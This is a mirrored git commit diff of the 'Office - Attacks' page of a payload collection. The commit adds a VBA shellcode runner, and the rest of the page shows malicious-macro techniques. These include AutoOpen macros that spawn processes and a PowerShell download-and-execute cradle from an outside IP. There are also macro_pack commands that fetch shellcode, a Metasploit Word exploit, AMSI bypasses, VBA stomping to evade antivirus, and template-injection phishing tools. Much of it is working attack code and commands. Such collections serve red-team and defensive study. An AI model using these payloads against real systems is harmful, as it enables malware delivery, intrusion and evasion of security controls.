mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Add Office execute WinAPI via VBA
This commit is contained in:
parent
47df1695a1
commit
2a4ce78080
@ -1,9 +1,10 @@
|
|||||||
# Office - Attacks
|
# Office - Attacks
|
||||||
|
|
||||||
## Summary
|
### Summary
|
||||||
|
|
||||||
* [Office Products Features](#office-products-features)
|
* [Office Products Features](#office-products-features)
|
||||||
* [Office Default Passwords](#office-default-passwords)
|
* [Office Default Passwords](#office-default-passwords)
|
||||||
|
* [Office Macro execute WinAPI](#office-macro-execute-winapi)
|
||||||
* [Excel](#excel)
|
* [Excel](#excel)
|
||||||
* [XLSM - Hot Manchego](#xlsm---hot-manchego)
|
* [XLSM - Hot Manchego](#xlsm---hot-manchego)
|
||||||
* [XLS - Macrome](#xls---macrome)
|
* [XLS - Macrome](#xls---macrome)
|
||||||
@ -51,8 +52,55 @@ By default, Excel does not set a password when saving a new file. However, some
|
|||||||
| Excel | VelvetSweatshop | all Excel formats |
|
| Excel | VelvetSweatshop | all Excel formats |
|
||||||
| PowerPoint | 01Hannes Ruescher/01 | .pps .ppt |
|
| PowerPoint | 01Hannes Ruescher/01 | .pps .ppt |
|
||||||
|
|
||||||
|
## Office Macro execute WinAPI
|
||||||
|
|
||||||
## XLSM - Hot Manchego
|
### Description
|
||||||
|
|
||||||
|
To importe Win32 function we need to use the keyword `Private Declare`
|
||||||
|
`Private Declare Function <NAME> Lib "<DLL_NAME>" Alias "<FUNCTION_IMPORTED>" (<ByVal/ByRef> <NAME_VAR> As <TYPE>, etc.) As <TYPE>`
|
||||||
|
If we work on 64bit, we need to add the keyword `PtrSafe` between the keywords `Declare` and `Function`
|
||||||
|
Importing the `GetUserNameA` from `advapi32.dll`:
|
||||||
|
```VBA
|
||||||
|
Private Declare PtrSafe Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByRef nSize As Long) As Long
|
||||||
|
```
|
||||||
|
`GetUserNameA` prototype in C:
|
||||||
|
```C
|
||||||
|
BOOL GetUserNameA(
|
||||||
|
LPSTR lpBuffer,
|
||||||
|
LPDWORD pcbBuffer
|
||||||
|
);
|
||||||
|
```
|
||||||
|
### Example with a simple Shellcode Runner
|
||||||
|
```VBA
|
||||||
|
Private Declare PtrSafe Function VirtualAlloc Lib "Kernel32.dll" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
|
||||||
|
Private Declare PtrSafe Function RtlMoveMemory Lib "Kernel32.dll" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
|
||||||
|
Private Declare PtrSafe Function CreateThread Lib "KERNEL32.dll" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
|
||||||
|
|
||||||
|
Sub WinAPI()
|
||||||
|
Dim buf As Variant
|
||||||
|
Dim addr As LongPtr
|
||||||
|
Dim counter As Long
|
||||||
|
Dim data As Long
|
||||||
|
|
||||||
|
buf = Array(252, ...)
|
||||||
|
|
||||||
|
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
|
||||||
|
|
||||||
|
|
||||||
|
For counter = LBound(buf) To UBound(buf)
|
||||||
|
data = buf(counter)
|
||||||
|
res = RtlMoveMemory(addr + counter, data, 1)
|
||||||
|
Next counter
|
||||||
|
res = CreateThread(0, 0, addr, 0, 0, 0)
|
||||||
|
|
||||||
|
|
||||||
|
End Sub
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Excel
|
||||||
|
|
||||||
|
### XLSM - Hot Manchego
|
||||||
|
|
||||||
> When using EPPlus, the creation of the Excel document varied significantly enough that most A/V didn't catch a simple lolbas payload to get a beacon on a target machine.
|
> When using EPPlus, the creation of the Excel document varied significantly enough that most A/V didn't catch a simple lolbas payload to get a beacon on a target machine.
|
||||||
|
|
||||||
@ -65,7 +113,7 @@ PS> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll
|
|||||||
PS> .\hot-manchego.exe .\blank.xlsm .\vba.txt
|
PS> .\hot-manchego.exe .\blank.xlsm .\vba.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
## XLM - Macrome
|
### XLM - Macrome
|
||||||
|
|
||||||
> XOR Obfuscation technique will NOT work with VBA macros since VBA is stored in a different stream that will not be encrypted when you password protect the document. This only works for Excel 4.0 macros.
|
> XOR Obfuscation technique will NOT work with VBA macros since VBA is stored in a different stream that will not be encrypted when you password protect the document. This only works for Excel 4.0 macros.
|
||||||
|
|
||||||
@ -96,7 +144,7 @@ Macrome build --decoy-document decoy_document.xls --payload-type Macro --payload
|
|||||||
When using Macrome build mode, the --password flag may be used to encrypt the generated document using XOR Obfuscation. If the default password of **VelvetSweatshop** is used when building the document, all versions of Excel will automatically decrypt the document without any additional user input. This password can only be set in Excel 2003.
|
When using Macrome build mode, the --password flag may be used to encrypt the generated document using XOR Obfuscation. If the default password of **VelvetSweatshop** is used when building the document, all versions of Excel will automatically decrypt the document without any additional user input. This password can only be set in Excel 2003.
|
||||||
|
|
||||||
|
|
||||||
## XLM Excel 4.0 - SharpShooter
|
### XLM Excel 4.0 - SharpShooter
|
||||||
|
|
||||||
* https://github.com/mdsecactivebreach/SharpShooter
|
* https://github.com/mdsecactivebreach/SharpShooter
|
||||||
|
|
||||||
@ -120,7 +168,7 @@ SharpShooter.py --payload slk --output foo --rawscfile /tmp/shellcode-86.bin --s
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## XLM Excel 4.0 - EXCELntDonut
|
### XLM Excel 4.0 - EXCELntDonut
|
||||||
|
|
||||||
* XLM (Excel 4.0) macros pre-date VBA and can be delivered in .xls files.
|
* XLM (Excel 4.0) macros pre-date VBA and can be delivered in .xls files.
|
||||||
* AMSI has no visibility into XLM macros (for now)
|
* AMSI has no visibility into XLM macros (for now)
|
||||||
@ -162,7 +210,7 @@ python3 drive.py --x64bin GruntHttpx64.bin --x86bin GruntHttpx86.bin
|
|||||||
XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f1391a7a598b456855/_posts/2020-05-25-Weaponizing-28-Year-Old-XLM-Macros.md
|
XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f1391a7a598b456855/_posts/2020-05-25-Weaponizing-28-Year-Old-XLM-Macros.md
|
||||||
|
|
||||||
|
|
||||||
## XLM Excel 4.0 - EXEC
|
### XLM Excel 4.0 - EXEC
|
||||||
|
|
||||||
1. Right Click to the current sheet
|
1. Right Click to the current sheet
|
||||||
2. Insert a **Macro IntL MS Excel 4.0**
|
2. Insert a **Macro IntL MS Excel 4.0**
|
||||||
@ -175,7 +223,7 @@ XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f13
|
|||||||
5. Hide your macro worksheet by a right mouse click on the sheet name **Macro1** and selecting **Hide**
|
5. Hide your macro worksheet by a right mouse click on the sheet name **Macro1** and selecting **Hide**
|
||||||
|
|
||||||
|
|
||||||
## SLK - EXEC
|
### SLK - EXEC
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
ID;P
|
ID;P
|
||||||
@ -186,8 +234,9 @@ C;X1;Y102;K0;EHALT()
|
|||||||
E
|
E
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Word
|
||||||
|
|
||||||
## DOCM - Metasploit
|
### DOCM - Metasploit
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
use exploit/multi/fileformat/office_word_macro
|
use exploit/multi/fileformat/office_word_macro
|
||||||
@ -200,7 +249,7 @@ set FILENAME Financial2021.docm
|
|||||||
exploit -j
|
exploit -j
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - Download and Execute
|
### DOCM - Download and Execute
|
||||||
|
|
||||||
> Detected by Defender (AMSI)
|
> Detected by Defender (AMSI)
|
||||||
|
|
||||||
@ -215,7 +264,7 @@ Execute
|
|||||||
End Sub
|
End Sub
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - Macro Creator
|
### DOCM - Macro Creator
|
||||||
|
|
||||||
* https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator
|
* https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator
|
||||||
|
|
||||||
@ -228,7 +277,7 @@ C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdav
|
|||||||
C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e
|
C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - C# converted to Office VBA macro
|
### DOCM - C# converted to Office VBA macro
|
||||||
|
|
||||||
> A message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted.
|
> A message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted.
|
||||||
|
|
||||||
@ -238,7 +287,7 @@ https://github.com/trustedsec/unicorn
|
|||||||
python unicorn.py payload.cs cs macro
|
python unicorn.py payload.cs cs macro
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - VBA Wscript
|
### DOCM - VBA Wscript
|
||||||
|
|
||||||
> https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
|
> https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
|
||||||
|
|
||||||
@ -263,7 +312,7 @@ CreateObject("WScript.Shell").Exec "notepad.exe"
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## DOCM - VBA Shell Execute Comment
|
### DOCM - VBA Shell Execute Comment
|
||||||
|
|
||||||
Set your command payload inside the **Comment** metadata of the document.
|
Set your command payload inside the **Comment** metadata of the document.
|
||||||
|
|
||||||
@ -287,7 +336,7 @@ End Sub
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## DOCM - VBA Spawning via svchost.exe using Scheduled Task
|
### DOCM - VBA Spawning via svchost.exe using Scheduled Task
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Sub AutoOpen()
|
Sub AutoOpen()
|
||||||
@ -311,7 +360,7 @@ End Sub
|
|||||||
Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))"
|
Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))"
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - WMI COM functions
|
### DOCM - WMI COM functions
|
||||||
|
|
||||||
Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)`
|
Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)`
|
||||||
|
|
||||||
@ -357,7 +406,7 @@ Set SW = GetObject("new:" & ShellWindows).Item()
|
|||||||
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0
|
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM/XLM - Macro Pack - Macro and DDE
|
### DOCM/XLM - Macro Pack - Macro and DDE
|
||||||
|
|
||||||
> Only the community version is available online.
|
> Only the community version is available online.
|
||||||
|
|
||||||
@ -419,7 +468,7 @@ echo "x86.bin" "x64.bin" | macro_pack.exe -t AUTOSHELLCODE -o –autopack -G sc_
|
|||||||
echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls
|
echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - BadAssMacros
|
### DOCM - BadAssMacros
|
||||||
|
|
||||||
> C# based automated Malicous Macro Generator.
|
> C# based automated Malicous Macro Generator.
|
||||||
|
|
||||||
@ -443,7 +492,7 @@ BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_o
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## DOCM - CACTUSTORCH VBA Module
|
### DOCM - CACTUSTORCH VBA Module
|
||||||
|
|
||||||
> CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript
|
> CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript
|
||||||
|
|
||||||
@ -465,7 +514,7 @@ BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_o
|
|||||||
6. Use the generated code to replace the hardcoded binary in CactusTorch
|
6. Use the generated code to replace the hardcoded binary in CactusTorch
|
||||||
|
|
||||||
|
|
||||||
## DOCM - MMG with Custom DL + Exec
|
### DOCM - MMG with Custom DL + Exec
|
||||||
|
|
||||||
1. Custom Download in first Macro to "C:\\Users\\Public\\beacon.exe"
|
1. Custom Download in first Macro to "C:\\Users\\Public\\beacon.exe"
|
||||||
2. Create a custom binary execute using MMG
|
2. Create a custom binary execute using MMG
|
||||||
@ -514,7 +563,7 @@ Sub Auto_Open()
|
|||||||
End Sub
|
End Sub
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
|
### DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
|
||||||
|
|
||||||
Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control`
|
Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control`
|
||||||
|
|
||||||
@ -526,7 +575,7 @@ End Sub
|
|||||||
|
|
||||||
|
|
||||||
|
|
||||||
## VBA Obfuscation
|
### VBA Obfuscation
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# https://www.youtube.com/watch?v=L0DlPOLx2k0
|
# https://www.youtube.com/watch?v=L0DlPOLx2k0
|
||||||
@ -534,13 +583,13 @@ $ git clone https://github.com/bonnetn/vba-obfuscator
|
|||||||
$ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin
|
$ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin
|
||||||
```
|
```
|
||||||
|
|
||||||
## VBA Purging
|
### VBA Purging
|
||||||
|
|
||||||
**VBA Stomping**: This technique allows attackers to remove compressed VBA code from Office documents and still execute malicious macros without many of the VBA keywords that AV engines had come to rely on for detection. == Removes P-code.
|
**VBA Stomping**: This technique allows attackers to remove compressed VBA code from Office documents and still execute malicious macros without many of the VBA keywords that AV engines had come to rely on for detection. == Removes P-code.
|
||||||
|
|
||||||
:warning: VBA stomping is not effective against Excel 97-2003 Workbook (.xls) format.
|
:warning: VBA stomping is not effective against Excel 97-2003 Workbook (.xls) format.
|
||||||
|
|
||||||
### OfficePurge
|
#### OfficePurge
|
||||||
* https://github.com/fireeye/OfficePurge/releases/download/v1.0/OfficePurge.exe
|
* https://github.com/fireeye/OfficePurge/releases/download/v1.0/OfficePurge.exe
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
@ -551,7 +600,7 @@ OfficePurge.exe -d word -f .\malicious.doc -l
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### EvilClippy
|
#### EvilClippy
|
||||||
|
|
||||||
> Evil Clippy uses the OpenMCDF library to manipulate CFBF files.
|
> Evil Clippy uses the OpenMCDF library to manipulate CFBF files.
|
||||||
> Evil Clippy compiles perfectly fine with the Mono C# compiler and has been tested on Linux, OSX and Windows.
|
> Evil Clippy compiles perfectly fine with the Mono C# compiler and has been tested on Linux, OSX and Windows.
|
||||||
@ -573,7 +622,7 @@ EvilClippy.exe -r macrofile.doc
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## VBA - Offensive Security Template
|
### VBA - Offensive Security Template
|
||||||
|
|
||||||
* Reverse Shell VBA - https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba
|
* Reverse Shell VBA - https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba
|
||||||
* Process Dumper - https://github.com/JohnWoodman/VBA-Macro-Dump-Process
|
* Process Dumper - https://github.com/JohnWoodman/VBA-Macro-Dump-Process
|
||||||
@ -583,7 +632,7 @@ EvilClippy.exe -r macrofile.doc
|
|||||||
* amsiByPassWithRTLMoveMemory - https://gist.github.com/DanShaqFu/1c57c02660b2980d4816d14379c2c4f3
|
* amsiByPassWithRTLMoveMemory - https://gist.github.com/DanShaqFu/1c57c02660b2980d4816d14379c2c4f3
|
||||||
* VBA macro spawning a process with a spoofed parent - https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba
|
* VBA macro spawning a process with a spoofed parent - https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba
|
||||||
|
|
||||||
## VBA - AMSI
|
### VBA - AMSI
|
||||||
|
|
||||||
> The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection. https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/
|
> The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection. https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/
|
||||||
|
|
||||||
@ -625,11 +674,11 @@ Private Sub Document_Open()
|
|||||||
End Sub
|
End Sub
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCX - Template Injection
|
### DOCX - Template Injection
|
||||||
|
|
||||||
:warning: Does not require "Enable Macro"
|
:warning: Does not require "Enable Macro"
|
||||||
|
|
||||||
### Remote Template
|
#### Remote Template
|
||||||
|
|
||||||
1. A malicious macro is saved in a Word template .dotm file
|
1. A malicious macro is saved in a Word template .dotm file
|
||||||
2. Benign .docx file is created based on one of the default MS Word Document templates
|
2. Benign .docx file is created based on one of the default MS Word Document templates
|
||||||
@ -647,7 +696,7 @@ End Sub
|
|||||||
```
|
```
|
||||||
7. File gets zipped back up again and renamed to .docx
|
7. File gets zipped back up again and renamed to .docx
|
||||||
|
|
||||||
### Template Injections Tools
|
#### Template Injections Tools
|
||||||
|
|
||||||
* https://github.com/JohnWoodman/remoteInjector
|
* https://github.com/JohnWoodman/remoteInjector
|
||||||
* https://github.com/ryhanson/phishery
|
* https://github.com/ryhanson/phishery
|
||||||
@ -661,7 +710,7 @@ $ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## DOCX - DDE
|
### DOCX - DDE
|
||||||
|
|
||||||
* Insert > QuickPart > Field
|
* Insert > QuickPart > Field
|
||||||
* Right Click > Toggle Field Code
|
* Right Click > Toggle Field Code
|
||||||
|
Loading…
Reference in New Issue
Block a user